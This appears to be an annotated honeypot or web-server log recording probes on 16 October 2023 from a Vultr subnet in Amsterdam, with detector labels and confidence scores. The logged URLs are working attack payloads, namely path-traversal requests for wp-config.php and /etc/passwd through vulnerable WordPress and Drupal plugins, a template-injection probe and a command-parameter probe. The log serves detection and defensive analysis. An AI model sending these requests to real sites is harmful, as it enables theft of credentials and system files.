#36 2023-10-16 20:45:01 event 233571 GET 403 bytes 555
ann trav 28 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Annotation facts
label
trav
rule
trav:dotdot_slash
conf
92.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot)
url
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#37 2023-10-16 20:45:01 event 233571 GET 403 bytes 555
ann trav 34 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Annotation facts
label
trav
rule
trav:sensitive_target
conf
95.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
url
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#38 2023-10-16 20:45:01 event 233571 GET 403 bytes 555
ann sfp 34 label sensitive_file
Request Directory traversal indicator
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Annotation facts
label
sensitive_file
rule
sfp:traversal
conf
86.00
details
Traversal sequences were present (raw or encoded). Snippet='s/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php'
url
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#39 2023-10-16 20:45:01 event 233571 GET 403 bytes 555
ann sfp 36 label sensitive_file
Request Probe for CMS/app configuration file
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Annotation facts
label
sensitive_file
rule
sfp:file:app_config
conf
88.00
details
Request targeted a common CMS/app configuration file. Snippet='es/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php'
url
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#40 2023-10-16 20:45:01 event 233571 GET 403 bytes 555
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
url
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#41 2023-10-16 20:43:38 event 233570 POST 404 bytes 6301
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
url
/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#42 2023-10-16 20:42:19 event 233567 GET 200 bytes 8534
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
url
/?id=brcr3S%25{128*128}
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#43 2023-10-16 20:41:30 event 233565 GET 404 bytes 6301
ann sfp 36 label sensitive_file
Request Command-style parameter observed
referer
-
UA
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Annotation facts
label
sensitive_file
rule
sfp:param:cmd
conf
86.00
details
A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/device.rsp?opt=user&cmd=list'
url
/device.rsp?opt=user&cmd=list
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#44 2023-10-16 20:41:30 event 233565 GET 404 bytes 6301
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
url
/device.rsp?opt=user&cmd=list
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#45 2023-10-16 20:37:45 event 233560 GET 404 bytes 6301
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
url
/user/scripts/login_par.js
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#46 2023-10-16 20:37:32 event 233556 GET 404 bytes 6301
ann trav 26 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Annotation facts
label
trav
rule
trav:mixed_separators
conf
90.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
url
/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#47 2023-10-16 20:37:32 event 233556 GET 404 bytes 6301
ann trav 28 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Annotation facts
label
trav
rule
trav:dotdot_slash
conf
92.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
url
/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#48 2023-10-16 20:37:32 event 233556 GET 404 bytes 6301
ann sfp 8 label sensitive_file
Request File/path-style parameter observed (weak hint)
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Annotation facts
label
sensitive_file
rule
sfp:param:file_path_hint
conf
60.00
details
A file/path/download-style parameter was present; treated as a weak correlating hint. Snippet='file/path/download param present'
url
/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#49 2023-10-16 20:37:32 event 233556 GET 404 bytes 6301
ann sfp 34 label sensitive_file
Request Directory traversal indicator
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Annotation facts
label
sensitive_file
rule
sfp:traversal
conf
86.00
details
Traversal sequences were present (raw or encoded). Snippet='/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd'
url
/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#50 2023-10-16 20:37:32 event 233556 GET 404 bytes 6301
ann sfp 44 label sensitive_file
Request Probe for OS credential/secret file
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Annotation facts
label
sensitive_file
rule
sfp:file:os_secrets
conf
94.00
details
Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd'
url
/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam